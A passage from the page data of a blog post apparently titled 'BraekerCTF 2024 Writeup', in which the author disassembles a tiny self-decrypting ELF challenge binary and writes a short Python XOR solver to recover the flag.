url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA5ElEQVQY042PS1PCMBCAe1IU8YHjo1XUClSxrzTSFG0LBR3R0WE8ePDi//8Zn010HI89fLNJdvfbjXXfT0lOAlJboGxF5ijEfkKwHRD+EnR8ZDdifqaYOreUjqTqpeRHgtnp2ER9r3pjrPwgRu2MmHR9ymNBfhgj2wPilotoXSI2+oa4PofrriH6iz9v0b+c9erPWXqlmaD2bkh3R8iOh9zySNpDYi3T0s1BI6yi3urNXxhhuHZhpi3OM56vpiyHhRFrdHETsZXVX30XTxR2YlbWTQ/uhJfrGV/VB593K1bhY2PhN9FCkFh13em+AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d4c7db6e7274fb38370d08b06c539867/8ac56/image-20240225180121067.webp 240w,\n/static/d4c7db6e7274fb38370d08b06c539867/d3be9/image-20240225180121067.webp 480w,\n/static/d4c7db6e7274fb38370d08b06c539867/e46b2/image-20240225180121067.webp 960w,\n/static/d4c7db6e7274fb38370d08b06c539867/62502/image-20240225180121067.webp 1183w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d4c7db6e7274fb38370d08b06c539867/8ff5a/image-20240225180121067.png 240w,\n/static/d4c7db6e7274fb38370d08b06c539867/e85cb/image-20240225180121067.png 480w,\n/static/d4c7db6e7274fb38370d08b06c539867/d9199/image-20240225180121067.png 960w,\n/static/d4c7db6e7274fb38370d08b06c539867/7798c/image-20240225180121067.png 1183w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d4c7db6e7274fb38370d08b06c539867/d9199/image-20240225180121067.png\"\n            alt=\"image-20240225180121067\"\n            title=\"image-20240225180121067\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It appears the code pops the next execution address after the entry point (which was on the stack top) into rdx, stores rdx into rax, and then jumps to address 0x78 (0x3e+58).</p>\n<p>Using the same approach, I disassemble the next block of code extracted with <code class=\"language-text\">dd if=binary_shrink of=outdata bs=1 skip=120</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1c3bab040f9b1ddb479e20556250f684/60b3a/image-20240225180248116.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABLklEQVQoz42RW0/CQBCF+yQXBTQoIGqwBQTDbrftttALdxCCt5gY//9POc4uNoQX6cPJSXe335yZMQLThdtkGDYkZCOArEnwSxuswsHKjJxhUBrAqwqsHkPM7iSmpEVriHHDxfwhwOSW/N7X90Z4RY/Pu4ivOZKajfiGwy224eQtOIWDBH3zMxM8d5Cds45c3Ruf9hov7VhXGlOlkMB2noDFDlwqpFyQnIwyFOxb7rA2IyR1gYgSrswQm06C98GCkrUhCvsCqf8LVH1/sCVkqadjuxddrK1oD6RzBUmVBWpsu2OdMKk71KqlwSrtrjfFT/AGPRIrPoKeBH45G0yanv7BKz1hSalfn+dYtkaIa4K26Ol5ZgbOaOWq3fRQjUC1Paoy+OU+/Er/L+HppfwCZV3nOAjzYI4AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1c3bab040f9b1ddb479e20556250f684/8ac56/image-20240225180248116.webp 240w,\n/static/1c3bab040f9b1ddb479e20556250f684/d3be9/image-20240225180248116.webp 480w,\n/static/1c3bab040f9b1ddb479e20556250f684/e46b2/image-20240225180248116.webp 960w,\n/static/1c3bab040f9b1ddb479e20556250f684/58f5f/image-20240225180248116.webp 1179w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1c3bab040f9b1ddb479e20556250f684/8ff5a/image-20240225180248116.png 240w,\n/static/1c3bab040f9b1ddb479e20556250f684/e85cb/image-20240225180248116.png 480w,\n/static/1c3bab040f9b1ddb479e20556250f684/d9199/image-20240225180248116.png 960w,\n/static/1c3bab040f9b1ddb479e20556250f684/60b3a/image-20240225180248116.png 1179w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1c3bab040f9b1ddb479e20556250f684/d9199/image-20240225180248116.png\"\n            alt=\"image-20240225180248116\"\n            title=\"image-20240225180248116\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After performing several operations, it appears to loop through an XOR operation.</p>\n<p>The following is a reconstruction of the entire code sequence so far (not actual buildable code).</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">section <span class=\"token punctuation\">.</span>text\nglobal _start\n\nfirst<span class=\"token operator\">:</span>\n    pop    rdx\n    mov    rax<span class=\"token punctuation\">,</span>rdx\n    jmp    second\n\nsecond<span class=\"token operator\">:</span>\n    add    rdx<span class=\"token punctuation\">,</span><span class=\"token number\">0x91</span>\n    sub    rax<span class=\"token punctuation\">,</span><span class=\"token number\">0xe</span>\n    mov    rsi<span class=\"token punctuation\">,</span>rax\n    xor    ecx<span class=\"token punctuation\">,</span>ecx\n    mov    cl<span class=\"token punctuation\">,</span><span class=\"token number\">0x56</span>\n    mov    rax<span class=\"token punctuation\">,</span>rsi\npoint<span class=\"token operator\">:</span>\n    mov    sil<span class=\"token punctuation\">,</span>BYTE PTR <span class=\"token punctuation\">[</span>rax<span class=\"token punctuation\">]</span>\n    xor    BYTE PTR <span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>sil\n    xor    QWORD PTR <span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x42</span>\n    inc    rdx\n    inc    rax\n    loop   point\n\n_start<span class=\"token operator\">:</span>\n    call first</code></pre></div>\n<p>Both rax and rdx should hold the return address that was on the stack top — that is, the next instruction address after the entry point.</p>\n<p>Therefore, <code class=\"language-text\">sub rax,0xe</code> stores the image base address in rax, and <code class=\"language-text\">add rdx,0x91</code> stores the address <code class=\"language-text\">image base + 0xe + 0x91</code> in rdx.</p>\n<p>In the loop, rax and rdx are incremented together, and for each of 0x56 iterations, the value at the address in rax is XORed with the value at rdx, and then XORed with 0x42.</p>\n<p>I wrote the following solver to perform this binary manipulation.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"binary_shrink\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    data <span class=\"token operator\">=</span> <span class=\"token builtin\">bytearray</span><span class=\"token punctuation\">(</span>f<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token builtin\">bytearray</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span> <span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\nrax <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\nrdx <span class=\"token operator\">=</span> <span class=\"token number\">0xe</span> <span class=\"token operator\">+</span> <span class=\"token number\">0x91</span>\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"generated_binary\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x56</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        data<span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> data<span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span> <span class=\"token operator\">^</span> data<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span>\n        data<span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> data<span class=\"token punctuation\">[</span>rdx<span class=\"token punctuation\">]</span> <span class=\"token operator\">^</span> <span class=\"token number\">0x42</span>\n        rdx <span class=\"token operator\">+=</span> <span class=\"token number\">1</span>\n    \n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Reading the instructions in the output binary, the region that previously contained bad data has been replaced with a <code class=\"language-text\">jmp</code> instruction.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1aae7e15040d7e10e72af716a6774346/04784/image-20240225192344388.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABFklEQVQoz42RW0/CQBCF90UtCogxKEU0toVq6G3bbqm9RTAIBjHxwfj//8lxZzQ8mj6czOztzDezorQU0kkIZYbIxwtWOkzg9zwEfZKv8znkwMfyNkNjJqiuJecUazPWMcLzRGF1l0EsbxSaUYynCw+1PmhGEml3hvDEYkWGDdlxEHVsBHod8L59iHzP+Ds7tiA20wpbt8HbQ/NLME6w0ObZYI6KzPuP2syBPJ22ksgvfaztAp9yg2IY8GPCJ3PaS3ouV6bLEZP+by7KqwivTokP/4XR/aP7g+GX2nFORdtSilrPj9r+zveaMGRDapuKEOG7t8JeS53r1g2nneHaKrCd1Yi7Lg+Xfo7mSpS0js9mkFptKH8AWabKo+vRX5YAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1aae7e15040d7e10e72af716a6774346/8ac56/image-20240225192344388.webp 240w,\n/static/1aae7e15040d7e10e72af716a6774346/d3be9/image-20240225192344388.webp 480w,\n/static/1aae7e15040d7e10e72af716a6774346/e46b2/image-20240225192344388.webp 960w,\n/static/1aae7e15040d7e10e72af716a6774346/963af/image-20240225192344388.webp 1174w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1aae7e15040d7e10e72af716a6774346/8ff5a/image-20240225192344388.png 240w,\n/static/1aae7e15040d7e10e72af716a6774346/e85cb/image-20240225192344388.png 480w,\n/static/1aae7e15040d7e10e72af716a6774346/d9199/image-20240225192344388.png 960w,\n/static/1aae7e15040d7e10e72af716a6774346/04784/image-20240225192344388.png 1174w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1aae7e15040d7e10e72af716a6774346/d9199/image-20240225192344388.png\"\n            alt=\"image-20240225192344388\"\n            title=\"image-20240225192344388\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reading the code at the jump destination, it was code that outputs <code class=\"language-text\">0xa293a3e</code>, i.e., <code class=\"language-text\">):>\\n</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a2e83298ce2722d6c58238d1fbc90347/712f7/image-20240225192657626.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABL0lEQVQoz5VR207CQBTsi6AoFCUB6yVQbIHC0u1l23IrEKgWiTGa+P+/Mu5ZlciL4MNkz57szpyZo4VND4HBEBsRIiOGaAgw3QWrMIWhzjAoDxDWODJzhNQIsLgTWDUTzK49LO8j2fOxuBVYt0bQkmof4UUH07qLWYNjXGPwTtsKXMHc1cOCCbcoz6K5V//uaS9shSdrKtV8xFcDCN0BL1nwpQghKHclOuBnFrzSYWhEtnWWEJWe/PSAqOoogU13jjf+qKyN5NQuTX0MIWXwOswwqXMkcsL4so9NJ0XWnmAtM6Me2aHHJEj4k3DVSvAhtsoeK7TUhFl7jNyeqcDZSRP+uX2QaEdIm3n3869P0pbQe3juzZVt2hwFfgzRHmFup+pCOf1kmN4ECL9z/Q/hJyLs5Xy/cDM3AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a2e83298ce2722d6c58238d1fbc90347/8ac56/image-20240225192657626.webp 240w,\n/static/a2e83298ce2722d6c58238d1fbc90347/d3be9/image-20240225192657626.webp 480w,\n/static/a2e83298ce2722d6c58238d1fbc90347/e46b2/image-20240225192657626.webp 960w,\n/static/a2e83298ce2722d6c58238d1fbc90347/a110d/image-20240225192657626.webp 1181w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a2e83298ce2722d6c58238d1fbc90347/8ff5a/image-20240225192657626.png 240w,\n/static/a2e83298ce2722d6c58238d1fbc90347/e85cb/image-20240225192657626.png 480w,\n/static/a2e83298ce2722d6c58238d1fbc90347/d9199/image-20240225192657626.png 960w,\n/static/a2e83298ce2722d6c58238d1fbc90347/712f7/image-20240225192657626.png 1181w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a2e83298ce2722d6c58238d1fbc90347/d9199/image-20240225192657626.png\"\n            alt=\"image-20240225192657626\"\n            title=\"image-20240225192657626\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The memory state at the moment this code executes matches the state of the decrypted binary loaded into process memory, so we were able to retrieve the flag from this binary data.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 868px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/df079e28b57b9a08c795779dde299826/748b0/image-20240225192737962.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 40%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABrklEQVQoz2WRXVfaQBCGuan24xx7ir1Qa48IcqCFQAAJSSAhCTEBxQSCfIZPLdr//wfezo69sb14z+7Ozjz77kzCkdvoaC60gop2vgk9ZULP2DCyNvS0Bf3KgZlz0cpYqJ4oqJ/rkJIVKGcK/GwL3ZyJXt7k1U1rSDz7S+y9GFHZw9aeIG6G2FgP+OXNsdADio3x6E6xc8YIpQ6MExnacRHqcQG1oxyK7y5QPEixpINLJJ78BYSGVR+PBImNCGtrjK07w1QNsCYgi2K3Pyw0kkWY365hnNWgfpVQ/pCB/CkL+eMVK/F8u8Lv/gajWo/BoliA970l5s0Btp0pnrwFn/sFB6XDNJQvP6EkC7j+nH8F/oUxUCQKaFTtMiw2IyzNESni2KI1YNer9ogdWt/r3K+bjI7WaQWl9+m3wJe7NV7IYVi+YchUvWcxsNZll0KxMURAPZw0+nw/00MGS9S7/xzueysMKz4Vhpz4CgnZodgLdzMtwD0B7YsGP/5Qv6MW2DSUf4Diu8KlSJ7RVEXhhr6+o6HMCb6jCYvz1plwjnAVlFwMZA9OqgHp8PIN8A/qqxO+quJ47AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/df079e28b57b9a08c795779dde299826/8ac56/image-20240225192737962.webp 240w,\n/static/df079e28b57b9a08c795779dde299826/d3be9/image-20240225192737962.webp 480w,\n/static/df079e28b57b9a08c795779dde299826/1ae05/image-20240225192737962.webp 868w\"\n              sizes=\"(max-width: 868px) 100vw, 868px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/df079e28b57b9a08c795779dde299826/8ff5a/image-20240225192737962.png 240w,\n/static/df079e28b57b9a08c795779dde299826/e85cb/image-20240225192737962.png 480w,\n/static/df079e28b57b9a08c795779dde299826/748b0/image-20240225192737962.png 868w\"\n            sizes=\"(max-width: 868px) 100vw, 868px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/df079e28b57b9a08c795779dde299826/748b0/image-20240225192737962.png\"\n            alt=\"image-20240225192737962\"\n            title=\"image-20240225192737962\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>I had no prior knowledge of Tiny ELF at all, so this was a great learning experience.</p>","fields":{"slug":"/breaker-ctf-2024-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2024-02-25","description":"BraekerCTF 2024 Writeup","tags":["Rev (en)","Pwn (en)","English"],"title":"BraekerCTF 2024 Writeup","socialImage":{"publicURL":"/static/17b75e0e79b65ff02d61decee9d3f5db/breaker-ctf-2024.png"}}}},"pageContext":{"slug":"/breaker-ctf-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}